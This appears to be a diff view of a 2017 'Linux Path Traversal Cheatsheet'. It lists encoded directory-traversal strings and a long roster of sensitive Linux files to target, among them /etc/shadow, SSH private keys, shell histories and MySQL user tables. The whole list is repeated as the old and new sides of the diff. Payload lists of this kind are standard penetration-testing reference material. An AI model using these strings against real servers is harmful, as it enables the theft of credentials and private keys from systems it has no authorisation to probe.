SleepyLctl · July 30, 2017 11:03
diff --git a/Linux Path Traversal Cheatsheet b/Linux Path Traversal Cheatsheet

 Encoded Traversal Strings:

 ../
 ..\
 ..\/
 %2e%2e%2f
 %252e%252e%252f
 %c0%ae%c0%ae%c0%af
 %uff0e%uff0e%u2215
 %uff0e%uff0e%u2216
 ..././
 ...\.\

 File Disclosure Cheat Sheet

 /etc/passwd
 /etc/shadow
 /etc/aliases
 /etc/anacrontab
 /etc/apache2/apache2.conf
 /etc/apache2/httpd.conf
 /etc/at.allow
 /etc/at.deny
 /etc/bashrc
 /etc/bootptab
 /etc/chrootUsers
 /etc/chttp.conf
 /etc/cron.allow
 /etc/cron.deny
 /etc/crontab
 /etc/cups/cupsd.conf
 /etc/exports
 /etc/fstab
 /etc/ftpaccess
 /etc/ftpchroot
 /etc/ftphosts
 /etc/groups
 /etc/grub.conf
 /etc/hosts
 /etc/hosts.allow
 /etc/hosts.deny
 /etc/httpd/access.conf
 /etc/httpd/conf/httpd.conf
 /etc/httpd/httpd.conf
 /etc/httpd/logs/access_log
 /etc/httpd/logs/access.log
 /etc/httpd/logs/error_log
 /etc/httpd/logs/error.log
 /etc/httpd/php.ini
 /etc/httpd/srm.conf
 /etc/inetd.conf
 /etc/inittab
 /etc/issue
 /etc/lighttpd.conf
 /etc/lilo.conf
 /etc/logrotate.d/ftp
 /etc/logrotate.d/proftpd
 /etc/logrotate.d/vsftpd.log
 /etc/lsb-release
 /etc/motd
 /etc/modules.conf
 /etc/motd
 /etc/mtab
 /etc/my.cnf
 /etc/my.conf
 /etc/mysql/my.cnf
 /etc/network/interfaces
 /etc/networks
 /etc/npasswd
 /etc/passwd
 /etc/php4.4/fcgi/php.ini
 /etc/php4/apache2/php.ini
 /etc/php4/apache/php.ini
 /etc/php4/cgi/php.ini
 /etc/php4/apache2/php.ini
 /etc/php5/apache2/php.ini
 /etc/php5/apache/php.ini
 /etc/php/apache2/php.ini
 /etc/php/apache/php.ini
 /etc/php/cgi/php.ini
 /etc/php.ini
 /etc/php/php4/php.ini
 /etc/php/php.ini
 /etc/printcap
 /etc/profile
 /etc/proftp.conf
 /etc/proftpd/proftpd.conf
 /etc/pure-ftpd.conf
 /etc/pureftpd.passwd
 /etc/pureftpd.pdb
 /etc/pure-ftpd/pure-ftpd.conf
 /etc/pure-ftpd/pure-ftpd.pdb
 /etc/pure-ftpd/putreftpd.pdb
 /etc/redhat-release
 /etc/resolv.conf
 /etc/samba/smb.conf
 /etc/snmpd.conf
 /etc/ssh/ssh_config
 /etc/ssh/sshd_config
 /etc/ssh/ssh_host_dsa_key
 /etc/ssh/ssh_host_dsa_key.pub
 /etc/ssh/ssh_host_key
 /etc/ssh/ssh_host_key.pub
 /etc/sysconfig/network
 /etc/syslog.conf
 /etc/termcap
 /etc/vhcs2/proftpd/proftpd.conf
 /etc/vsftpd.chroot_list
 /etc/vsftpd.conf
 /etc/vsftpd/vsftpd.conf
 /etc/wu-ftpd/ftpaccess
 /etc/wu-ftpd/ftphosts
 /etc/wu-ftpd/ftpusers
 /logs/pure-ftpd.log
 /logs/security_debug_log
 /logs/security_log
 /opt/lampp/etc/httpd.conf
 /opt/xampp/etc/php.ini
 /proc/cpuinfo
 /proc/filesystems
 /proc/interrupts
 /proc/ioports
 /proc/meminfo
 /proc/modules
 /proc/mounts
 /proc/stat
 /proc/swaps
 /proc/version
 /proc/self/net/arp
 /root/anaconda-ks.cfg
 /usr/etc/pure-ftpd.conf
 /usr/lib/php.ini
 /usr/lib/php/php.ini
 /usr/local/apache/conf/modsec.conf
 /usr/local/apache/conf/php.ini
 /usr/local/apache/log
 /usr/local/apache/logs
 /usr/local/apache/logs/access_log
 /usr/local/apache/logs/access.log
 /usr/local/apache/audit_log
 /usr/local/apache/error_log
 /usr/local/apache/error.log
 /usr/local/cpanel/logs
 /usr/local/cpanel/logs/access_log
 /usr/local/cpanel/logs/error_log
 /usr/local/cpanel/logs/license_log
 /usr/local/cpanel/logs/login_log
 /usr/local/cpanel/logs/stats_log
 /usr/local/etc/httpd/logs/access_log
 /usr/local/etc/httpd/logs/error_log
 /usr/local/etc/php.ini
 /usr/local/etc/pure-ftpd.conf
 /usr/local/etc/pureftpd.pdb
 /usr/local/lib/php.ini
 /usr/local/php4/httpd.conf
 /usr/local/php4/httpd.conf.php
 /usr/local/php4/lib/php.ini
 /usr/local/php5/httpd.conf
 /usr/local/php5/httpd.conf.php
 /usr/local/php5/lib/php.ini
 /usr/local/php/httpd.conf
 /usr/local/php/httpd.conf.ini
 /usr/local/php/lib/php.ini
 /usr/local/pureftpd/etc/pure-ftpd.conf
 /usr/local/pureftpd/etc/pureftpd.pdn
 /usr/local/pureftpd/sbin/pure-config.pl
 /usr/local/www/logs/httpd_log
 /usr/local/Zend/etc/php.ini
 /usr/sbin/pure-config.pl
 /var/adm/log/xferlog
 /var/apache2/config.inc
 /var/apache/logs/access_log
 /var/apache/logs/error_log
 /var/cpanel/cpanel.config
 /var/lib/mysql/my.cnf
 /var/lib/mysql/mysql/user.MYD
 /var/local/www/conf/php.ini
 /var/log/apache2/access_log
 /var/log/apache2/access.log
 /var/log/apache2/error_log
 /var/log/apache2/error.log
 /var/log/apache/access_log
 /var/log/apache/access.log
 /var/log/apache/error_log
 /var/log/apache/error.log
 /var/log/apache-ssl/access.log
 /var/log/apache-ssl/error.log
 /var/log/auth.log
 /var/log/boot
 /var/htmp
 /var/log/chttp.log
 /var/log/cups/error.log
 /var/log/daemon.log
 /var/log/debug
 /var/log/dmesg
 /var/log/dpkg.log
 /var/log/exim_mainlog
 /var/log/exim/mainlog
 /var/log/exim_paniclog
 /var/log/exim.paniclog
 /var/log/exim_rejectlog
 /var/log/exim/rejectlog
 /var/log/faillog
 /var/log/ftplog
 /var/log/ftp-proxy
 /var/log/ftp-proxy/ftp-proxy.log
 /var/log/httpd/access_log
 /var/log/httpd/access.log
 /var/log/httpd/error_log
 /var/log/httpd/error.log
 /var/log/httpsd/ssl.access_log
 /var/log/httpsd/ssl_log
 /var/log/kern.log
 /var/log/lastlog
 /var/log/lighttpd/access.log
 /var/log/lighttpd/error.log
 /var/log/lighttpd/lighttpd.access.log
 /var/log/lighttpd/lighttpd.error.log
 /var/log/mail.info
 /var/log/mail.log
 /var/log/maillog
 /var/log/mail.warn
 /var/log/message
 /var/log/messages
 /var/log/mysqlderror.log
 /var/log/mysql.log
 /var/log/mysql/mysql-bin.log
 /var/log/mysql/mysql.log
 /var/log/mysql/mysql-slow.log
 /var/log/proftpd
 /var/log/pureftpd.log
 /var/log/pure-ftpd/pure-ftpd.log
 /var/log/secure
 /var/log/vsftpd.log
 /var/log/wtmp
 /var/log/xferlog
 /var/log/yum.log
 /var/mysql.log
 /var/run/utmp
 /var/spool/cron/crontabs/root
 /var/webmin/miniserv.log
 /var/www/log/access_log
 /var/www/log/error_log
 /var/www/logs/access_log
 /var/www/logs/error_log
 /var/www/logs/access.log
 /var/www/logs/error.log
 ~/.atfp_history
 ~/.bash_history
 ~/.bash_logout
 ~/.bash_profile
 ~/.bashrc
 ~/.gtkrc
 ~/.login
 ~/.logout
 ~/.mysql_history
 ~/.nano_history
 ~/.php_history
 ~/.profile
 ~/.ssh/authorized_keys
 ~/.ssh/id_dsa
 ~/.ssh/id_dsa.pub
 ~/.ssh/id_rsa
 ~/.ssh/id_rsa.pub
 ~/.ssh/identity
 ~/.ssh/identity.pub
 ~/.viminfo
 ~/.wm_style
 ~/.Xdefaults
 ~/.xinitrc
 ~/.Xresources
 ~/.xsession

 Oh, and one last thing, take a look at this path on a Linux box:

 /proc/<int>/fd/<int>
 e.g.
 /proc/2116/fd/11

	Encoded Traversal Strings:

	../
	..\
	..\/
	%2e%2e%2f
	%252e%252e%252f
	%c0%ae%c0%ae%c0%af
	%uff0e%uff0e%u2215
	%uff0e%uff0e%u2216
	..././
	...\.\

	File Disclosure Cheat Sheet

	/etc/passwd
	/etc/shadow
	/etc/aliases
	/etc/anacrontab
	/etc/apache2/apache2.conf
	/etc/apache2/httpd.conf
	/etc/at.allow
	/etc/at.deny
	/etc/bashrc
	/etc/bootptab
	/etc/chrootUsers
	/etc/chttp.conf
	/etc/cron.allow
	/etc/cron.deny
	/etc/crontab
	/etc/cups/cupsd.conf
	/etc/exports
	/etc/fstab
	/etc/ftpaccess
	/etc/ftpchroot
	/etc/ftphosts
	/etc/groups
	/etc/grub.conf
	/etc/hosts
	/etc/hosts.allow
	/etc/hosts.deny
	/etc/httpd/access.conf
	/etc/httpd/conf/httpd.conf
	/etc/httpd/httpd.conf
	/etc/httpd/logs/access_log
	/etc/httpd/logs/access.log
	/etc/httpd/logs/error_log
	/etc/httpd/logs/error.log
	/etc/httpd/php.ini
	/etc/httpd/srm.conf
	/etc/inetd.conf
	/etc/inittab
	/etc/issue
	/etc/lighttpd.conf
	/etc/lilo.conf
	/etc/logrotate.d/ftp
	/etc/logrotate.d/proftpd
	/etc/logrotate.d/vsftpd.log
	/etc/lsb-release
	/etc/motd
	/etc/modules.conf
	/etc/motd
	/etc/mtab
	/etc/my.cnf
	/etc/my.conf
	/etc/mysql/my.cnf
	/etc/network/interfaces
	/etc/networks
	/etc/npasswd
	/etc/passwd
	/etc/php4.4/fcgi/php.ini
	/etc/php4/apache2/php.ini
	/etc/php4/apache/php.ini
	/etc/php4/cgi/php.ini
	/etc/php4/apache2/php.ini
	/etc/php5/apache2/php.ini
	/etc/php5/apache/php.ini
	/etc/php/apache2/php.ini
	/etc/php/apache/php.ini
	/etc/php/cgi/php.ini
	/etc/php.ini
	/etc/php/php4/php.ini
	/etc/php/php.ini
	/etc/printcap
	/etc/profile
	/etc/proftp.conf
	/etc/proftpd/proftpd.conf
	/etc/pure-ftpd.conf
	/etc/pureftpd.passwd
	/etc/pureftpd.pdb
	/etc/pure-ftpd/pure-ftpd.conf
	/etc/pure-ftpd/pure-ftpd.pdb
	/etc/pure-ftpd/putreftpd.pdb
	/etc/redhat-release
	/etc/resolv.conf
	/etc/samba/smb.conf
	/etc/snmpd.conf
	/etc/ssh/ssh_config
	/etc/ssh/sshd_config
	/etc/ssh/ssh_host_dsa_key
	/etc/ssh/ssh_host_dsa_key.pub
	/etc/ssh/ssh_host_key
	/etc/ssh/ssh_host_key.pub
	/etc/sysconfig/network
	/etc/syslog.conf
	/etc/termcap
	/etc/vhcs2/proftpd/proftpd.conf
	/etc/vsftpd.chroot_list
	/etc/vsftpd.conf
	/etc/vsftpd/vsftpd.conf
	/etc/wu-ftpd/ftpaccess
	/etc/wu-ftpd/ftphosts
	/etc/wu-ftpd/ftpusers
	/logs/pure-ftpd.log
	/logs/security_debug_log
	/logs/security_log
	/opt/lampp/etc/httpd.conf
	/opt/xampp/etc/php.ini
	/proc/cpuinfo
	/proc/filesystems
	/proc/interrupts
	/proc/ioports
	/proc/meminfo
	/proc/modules
	/proc/mounts
	/proc/stat
	/proc/swaps
	/proc/version
	/proc/self/net/arp
	/root/anaconda-ks.cfg
	/usr/etc/pure-ftpd.conf
	/usr/lib/php.ini
	/usr/lib/php/php.ini
	/usr/local/apache/conf/modsec.conf
	/usr/local/apache/conf/php.ini
	/usr/local/apache/log
	/usr/local/apache/logs
	/usr/local/apache/logs/access_log
	/usr/local/apache/logs/access.log
	/usr/local/apache/audit_log
	/usr/local/apache/error_log
	/usr/local/apache/error.log
	/usr/local/cpanel/logs
	/usr/local/cpanel/logs/access_log
	/usr/local/cpanel/logs/error_log
	/usr/local/cpanel/logs/license_log
	/usr/local/cpanel/logs/login_log
	/usr/local/cpanel/logs/stats_log
	/usr/local/etc/httpd/logs/access_log
	/usr/local/etc/httpd/logs/error_log
	/usr/local/etc/php.ini
	/usr/local/etc/pure-ftpd.conf
	/usr/local/etc/pureftpd.pdb
	/usr/local/lib/php.ini
	/usr/local/php4/httpd.conf
	/usr/local/php4/httpd.conf.php
	/usr/local/php4/lib/php.ini
	/usr/local/php5/httpd.conf
	/usr/local/php5/httpd.conf.php
	/usr/local/php5/lib/php.ini
	/usr/local/php/httpd.conf
	/usr/local/php/httpd.conf.ini
	/usr/local/php/lib/php.ini
	/usr/local/pureftpd/etc/pure-ftpd.conf
	/usr/local/pureftpd/etc/pureftpd.pdn
	/usr/local/pureftpd/sbin/pure-config.pl
	/usr/local/www/logs/httpd_log
	/usr/local/Zend/etc/php.ini
	/usr/sbin/pure-config.pl
	/var/adm/log/xferlog
	/var/apache2/config.inc
	/var/apache/logs/access_log
	/var/apache/logs/error_log
	/var/cpanel/cpanel.config
	/var/lib/mysql/my.cnf
	/var/lib/mysql/mysql/user.MYD
	/var/local/www/conf/php.ini
	/var/log/apache2/access_log
	/var/log/apache2/access.log
	/var/log/apache2/error_log
	/var/log/apache2/error.log
	/var/log/apache/access_log
	/var/log/apache/access.log
	/var/log/apache/error_log
	/var/log/apache/error.log
	/var/log/apache-ssl/access.log
	/var/log/apache-ssl/error.log
	/var/log/auth.log
	/var/log/boot
	/var/htmp
	/var/log/chttp.log
	/var/log/cups/error.log
	/var/log/daemon.log
	/var/log/debug
	/var/log/dmesg
	/var/log/dpkg.log
	/var/log/exim_mainlog
	/var/log/exim/mainlog
	/var/log/exim_paniclog
	/var/log/exim.paniclog
	/var/log/exim_rejectlog
	/var/log/exim/rejectlog
	/var/log/faillog
	/var/log/ftplog
	/var/log/ftp-proxy
	/var/log/ftp-proxy/ftp-proxy.log
	/var/log/httpd/access_log
	/var/log/httpd/access.log
	/var/log/httpd/error_log
	/var/log/httpd/error.log
	/var/log/httpsd/ssl.access_log
	/var/log/httpsd/ssl_log
	/var/log/kern.log
	/var/log/lastlog
	/var/log/lighttpd/access.log
	/var/log/lighttpd/error.log
	/var/log/lighttpd/lighttpd.access.log
	/var/log/lighttpd/lighttpd.error.log
	/var/log/mail.info
	/var/log/mail.log
	/var/log/maillog
	/var/log/mail.warn
	/var/log/message
	/var/log/messages
	/var/log/mysqlderror.log
	/var/log/mysql.log
	/var/log/mysql/mysql-bin.log
	/var/log/mysql/mysql.log
	/var/log/mysql/mysql-slow.log
	/var/log/proftpd
	/var/log/pureftpd.log
	/var/log/pure-ftpd/pure-ftpd.log
	/var/log/secure
	/var/log/vsftpd.log
	/var/log/wtmp
	/var/log/xferlog
	/var/log/yum.log
	/var/mysql.log
	/var/run/utmp
	/var/spool/cron/crontabs/root
	/var/webmin/miniserv.log
	/var/www/log/access_log
	/var/www/log/error_log
	/var/www/logs/access_log
	/var/www/logs/error_log
	/var/www/logs/access.log
	/var/www/logs/error.log
	~/.atfp_history
	~/.bash_history
	~/.bash_logout
	~/.bash_profile
	~/.bashrc
	~/.gtkrc
	~/.login
	~/.logout
	~/.mysql_history
	~/.nano_history
	~/.php_history
	~/.profile
	~/.ssh/authorized_keys
	~/.ssh/id_dsa
	~/.ssh/id_dsa.pub
	~/.ssh/id_rsa
	~/.ssh/id_rsa.pub
	~/.ssh/identity
	~/.ssh/identity.pub
	~/.viminfo
	~/.wm_style
	~/.Xdefaults
	~/.xinitrc
	~/.Xresources
	~/.xsession

	Oh, and one last thing, take a look at this path on a Linux box:

	/proc/<int>/fd/<int>
	e.g.
	/proc/2116/fd/11
No results found